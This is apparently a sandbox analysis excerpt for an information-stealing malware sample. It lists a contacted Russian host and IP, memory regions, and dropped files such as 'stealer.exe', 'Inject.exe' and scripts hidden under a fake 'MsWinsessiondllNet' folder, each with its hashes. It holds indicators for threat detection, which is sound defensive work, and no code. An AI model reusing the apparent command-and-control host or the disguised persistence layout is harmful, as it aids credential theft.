RU 141.8.192.103:80 a0947008.xsph.ru tcp

Files

memory/3196-0-0x0000000000400000-0x000000000084E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\stealer.exe

MD5 8cc1e7cf94fec9bc505ce7411aa28861
SHA1 08703de84f3db427c368f16c873664d78bd83264
SHA256 cc60087c94ea0ab843dcae2cdd76ac5e9c90599d2909bbba12881babf46158ba
SHA512 fe60f11452c9e470c0b63385cf0ee8f9fd07598c1294ba25cc8c7c093142efe865aba39680ae5f80611db9423717a7094c939f180e5195e7ae91a9633872a423

memory/1956-62-0x00007FF920783000-0x00007FF920785000-memory.dmp

memory/1956-83-0x0000025EB33F0000-0x0000025EB3430000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\чекер dc.exe

MD5 6216b6bef94c09a40bfa263809b1ae56
SHA1 a928120e65199c6aaae6c991aa0466f3f8b06020
SHA256 eabc7e4491961469ccb9c8cd716dbaf5285ecb8ad3edfc6bfec133a1ec80f05b
SHA512 0e311738b5bdf73f01c552b59646485418ab5b99862af5da2bb934d4262307ac8f57274bbd7f6c99376e6be99d424aad5282a73a063529310425666be224d215

C:\Users\Admin\AppData\Local\Temp\Inject.exe

MD5 d428ddd1b0ce85a6c96765aeaf246320
SHA1 d100efdaab5b2ad851fe75a28d0aa95deb920926
SHA256 453a331db812ed6e0ce6cca5d3b5be26e66c44b5f6fbdc88f98442670b8daecb
SHA512 3f9dda9d998ef282eb31644296ef0617bbf40352189f4ccd744191f466e932ffde2fd2bdaebe89f0bc06e465d57a8e46e08b3001fe834b3d989fc71125d25899

memory/1956-126-0x00007FF920780000-0x00007FF921241000-memory.dmp

memory/4132-127-0x00007FF61B710000-0x00007FF61B73A000-memory.dmp

C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe

MD5 7c9bb5fda146efee5ee4a243d6e404b0
SHA1 c2fb82a9efb3a2469e6a120ac4781a7fe26eb3dd
SHA256 1d4b4c4da6c16a2701cec1c24ff21168d26d4f81c0ac8b3e30ed01b8468d488b
SHA512 797e74b283e74a3282223d8035408d55269e4451a289e3873ea197624985121c87dccdbdef42ff99fd8b4d1fd7e856388444e3fc699a9d6b061499682a043771

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zgzpw44y.q30.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2700-143-0x000002795A960000-0x000002795A982000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

memory/1956-163-0x0000025ECDB40000-0x0000025ECDBB6000-memory.dmp

memory/1956-164-0x0000025ECDC20000-0x0000025ECDC70000-memory.dmp

memory/1956-165-0x0000025EB5180000-0x0000025EB519E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5824a6037c081fda5d46de274b6e2799
SHA1 526367a09300cbde430e8fb44e41cbe7a0937aac
SHA256 4d610d9cd32a20279c7133a726ff61820d6930e5aa18253ee1422f3a6f54953f
SHA512 a109b150f730cda78d5bee106bd232f9dca7500dfb7899c6919de2bd542e345ca271aa11809a24ea0a27dca158067ab3a2d5688ac0a2325185143245f1665582

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 276798eeb29a49dc6e199768bc9c2e71
SHA1 5fdc8ccb897ac2df7476fbb07517aca5b7a6205b
SHA256 cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc
SHA512 0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

memory/1956-201-0x0000025EB51D0000-0x0000025EB51DA000-memory.dmp

memory/1956-202-0x0000025ECDBC0000-0x0000025ECDBD2000-memory.dmp

C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat

MD5 ea70d7b0f1a8a1ff2d246efbdcfe1001
SHA1 252e762aee8fcc5761e17bb84aa3af8276852f5c
SHA256 1947411b5329e6db696c2354b56290b82aaf58b5f5d75fd4f3315fbe27999e31
SHA512 1fd28c415177644e069ded3e0ab3d27105fdac2d76f1060abb127e1961f310c81559e4c1213e61a7f32583cee9f4560106cafc88f0f20cf470edb756aadbec86

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 288f76eb6350b99897bf8a40a26d7b88
SHA1 7f386d05202de2cf090bbda84d633a640730e090
SHA256 1b9a2714ecfaf4b2e7d7961d5f2537ea360ad0df46a0fa789255235b077075d1
SHA512 ffafc9d47140408afba98a9832433c0829ba696524c56d03f4ce67ae84d369c658d3a0b3cbfc62f8e5d83fc91f8f73fc1dd9a27f0deaefd1d07485a63face869

C:\MsWinsessiondllNet\driverBrokercommon.exe

MD5 d84e590c3715c79dc5b92c435957d162
SHA1 2901580903e4b356448d9fe7bea510261e655363
SHA256 d81c1097d231fdcb536974ef025f230d1c4091bab3edcf4f9da9344b44b638ba
SHA512 b797cdb43776a7e8a19f9c93299857d8f88651e13c7ba5ddb57f0ac0b24c7b98e6cc6c20ae1561948fb49774edad31cd237f40c9c690d34923ffee56bc02a485

memory/1548-220-0x0000000000290000-0x00000000004DA000-memory.dmp

memory/1548-223-0x0000000002810000-0x0000000002818000-memory.dmp

memory/1548-222-0x00000000026E0000-0x00000000026E8000-memory.dmp

memory/1548-224-0x0000000002820000-0x0000000002830000-memory.dmp

memory/1548-225-0x0000000002830000-0x0000000002886000-memory.dmp

memory/1548-226-0x0000000002880000-0x000000000288C000-memory.dmp

memory/1548-227-0x000000001B070000-0x000000001B07C000-memory.dmp

memory/1548-228-0x000000001B080000-0x000000001B08C000-memory.dmp

memory/1548-229-0x000000001B090000-0x000000001B098000-memory.dmp

memory/1548-230-0x000000001B0A0000-0x000000001B0AA000-memory.dmp

memory/1548-231-0x000000001B0B0000-0x000000001B0BE000-memory.dmp

memory/1548-232-0x000000001B0C0000-0x000000001B0C8000-memory.dmp

memory/1548-233-0x000000001B0D0000-0x000000001B0DA000-memory.dmp

memory/1548-234-0x000000001B0E0000-0x000000001B0EC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\dFjI7tVufc.bat

MD5 27939e6ce9f09d94c026b20380a2905b
SHA1 bfa71a6eb344b183b7664f7f7627df0594c6da7e
SHA256 219a544ce956cfd600a42229c855784f3fc2a02a0b65ac5291e314b3f43c0436
SHA512 a5415e947a363bc50a37b0a5a5bd7fefe39e3d09d10761ffdf749efd11fbcf9330ac0ce1c57efd769c2120cbc10429c911963a225ea08d480582fb054e8f9850

memory/1956-258-0x0000025ECDC70000-0x0000025ECDE19000-memory.dmp

memory/1956-259-0x00007FF920780000-0x00007FF921241000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4f7f3a5f-13d0-4896-b122-f11ad12acd3b.vbs

MD5 618a9a810ab07f4b89dac17b4d779106
SHA1 38000ba42ac18b44659eeddd29f143c707fabc18
SHA256 525376b2e27972300d6b4fe9337f74dcf1eb136fa01af29dfd80abdabb521b68
SHA512 beafc7bd11f38f33532819b50af7d67649937b74c565dbc28e273e02df2868bc473b12094022ebbe9c5d656c6d672c3db8892e887d663c65431bcedad9294f6a

C:\Users\Admin\AppData\Local\Temp\bd577cd0-adcf-48e3-95fc-6ecef81cdaf1.vbs

MD5 67bcd6c3b47d72ab5e378e01c1450c0e
SHA1 738cacda8b69315f2e60611b32b373031176b333
SHA256 41ae76ac5a06b9166919e942b253ffb6b1cdfec9a47622ac8518c7e6306df7ab
SHA512 57246abd561e751572fca5065bf7c1f38275e689c00b7ca0f12f384bc7e2b24808f7654788b317c028d351089eb0229943a53f98004152271ce5fa3046bfebf7